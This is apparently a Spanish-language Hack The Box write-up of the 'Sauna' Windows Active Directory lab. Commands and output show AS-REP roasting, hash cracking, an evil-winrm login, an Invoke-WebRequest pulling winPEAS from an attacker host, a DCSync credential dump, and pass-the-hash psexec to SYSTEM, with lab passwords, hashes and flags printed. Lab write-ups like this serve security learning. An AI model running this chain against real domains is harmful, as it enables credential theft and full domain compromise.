Sauna
Sauna
Sauna Windows · Easy - Adventure mode
🔭 Reconocimiento:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(pmartinezr㉿kali)-[~]
└─$ nmap -p- -sSVC sauna.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-23 18:57 CET
Nmap scan report for sauna.htb (10.129.95.180)
Host is up (0.043s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-24 01:00:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2026-01-24T01:01:18
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 263.00 seconds
🔭 Reconocimiento:
1
2
3
4
5
6
7
8
Team
=========
Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver
Descubro algunos posibles usuarios.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
fsmith
hbear
skerb
scoins
btaylor
sdriver
ferguss
hugobear
stevenk
ShaunCoins
BowieTaylor
SophieDriver
drivershopie
admin
Basándome en los nombres de usuario preparo un fichero de usuarios con las iniciales del apellido o del nombre y distintas conbinaciones posibles. Muchas compañías crean los usuarios usando la letra inicial del nombre y el apellido.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(pmartinezr㉿kali)-[~/htb/sauna]
└─$ # Using Nmap
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICAL-BANK.LOCAL',userdb=team.txt sauna.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-23 19:43 CET
Nmap scan report for sauna.htb (10.129.95.180)
Host is up (0.042s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|_ fsmith@EGOTISTICAL-BANK.LOCAL
Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
Usando el script de Nmap krb5-enum-users descubrimos el usuario fsmith
1
2
3
4
5
6
┌──(pmartinezr㉿kali)-[~/htb/sauna]
└─$ impacket-GetNPUsers -request 'EGOTISTICAL-BANK.LOCAL/fsmith' -dc-ip sauna.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:38df19cc5f193f486b0ef8e9bfe43d5b$66f7fb7443e352a50f86bafbc2875a8382d9ff595f46973edd6cd901255709de8744639fedaf24b1a263071b8ff54b4f545cb8009c858af03542b6e13805b1c266e4945912cdc1deb5d71f79a4f38669a8145d21d8c4da1a9f315c12ac618bd75751a2d4a7c5fdcfe6ec47037597d3ebe4b41ac93f81f8a041b229cb4d686a17c69c426d90701a1c613c716c77ab881181e1f2d38bc7cbdac549b5bb0dbfea3178c85feecb8caf28d5e94a213531c970533dbfa6e8cdbda41f36ca55c6454819948dde67831acf1fa0b2dc5d9630a085ac098ad9aae9efc27279d7b2a7948e332c971d64754714c691c1a7708377bee777dc7a7648e3381596bc913db78e8412
impacket-GetNPUsers se utiliza para explotar una vulnerabilidad en el protocolo Kerberos de Active Directory, conocida como AS-REP Roasting. ¿Qué hace exactamente? Obtiene hashes de contraseñas: Solicita un TGT (Ticket Granting Ticket) de Kerberos para usuarios que no tienen preautenticación habilitada (una configuración insegura).Extrae el hash del TGT: Si el servidor responde con un TGT cifrado.
1
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:38df19cc5f193f486b0ef8e9bfe43d5b$66f7fb7443e352a50f86bafbc2875a8382d9ff595f46973edd6cd901255709de8744639fedaf24b1a263071b8ff54b4f545cb8009c858af03542b6e13805b1c266e4945912cdc1deb5d71f79a4f38669a8145d21d8c4da1a9f315c12ac618bd75751a2d4a7c5fdcfe6ec47037597d3ebe4b41ac93f81f8a041b229cb4d686a17c69c426d90701a1c613c716c77ab881181e1f2d38bc7cbdac549b5bb0dbfea3178c85feecb8caf28d5e94a213531c970533dbfa6e8cdbda41f36ca55c6454819948dde67831acf1fa0b2dc5d9630a085ac098ad9aae9efc27279d7b2a7948e332c971d64754714c691c1a7708377bee777dc7a7648e3381596bc913db78e8412:Thestrokes23
Con hashcat sacamos la contraseña fsmith:Thestrokes23
👽 Acciones:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(pmartinezr㉿kali)-[~/htb/sauna]
└─$ evil-winrm -u fsmith -p Thestrokes23 -i sauna.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
/var/lib/gems/3.3.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\FSmith\Documents>
*Evil-WinRM* PS C:\Users\FSmith> type Desktop/user.txt
9ef3285b0f2e5e22c3b57b089ed7cf6f
*Evil-WinRM* PS C:\Users\FSmith> dir c:\users
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2026 7:03 PM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr
Invoke-WebRequest -Uri "http://10.10.15.67:8000/winPEASx64.exe" -OutFile "C:\Users\FSmith\winPEASx64.exe"
Winpeas64.exe
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
Con Evil-Winrm sacamos la primera flag de usuario, descargamos winPEASx64.exe y este nos escuentra una segunda crendencial svc_loanmanager:Moneymakestheworldgoround!.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(pmartinezr㉿kali)-[~/htb/sauna]
└─$ impacket-secretsdump egotistical-bank/svc_loanmgr@10.129.96.197 -just-dc-user Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
[*] Cleaning up...
El siguiente paso es usar impacket-secretsdump con este usuario con ciertos permisos de administración para poder obtener los hashes del usuario Administrator.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(pmartinezr㉿kali)-[~/htb/sauna]
└─$ impacket-psexec 'EGOTISTICAL-BANK.LOCAL/administrator@sauna.htb' -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on sauna.htb.....
[*] Found writable share ADMIN$
[*] Uploading file YvUOCGNe.exe
[*] Opening SVCManager on sauna.htb.....
[*] Creating service bGaD on sauna.htb.....
[*] Starting service bGaD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
c:\Users\Administrator\Desktop> type root.txt
60ecc7a5eec92eafb8a35714cca47081
Finalmente usando impacket-psexec y los hashes obtenidos podemos sacar la flag de root.txt.
https://labs.hackthebox.com/achievement/machine/2336390/229
Esta entrada está licenciada bajo CC BY 4.0 por el autor.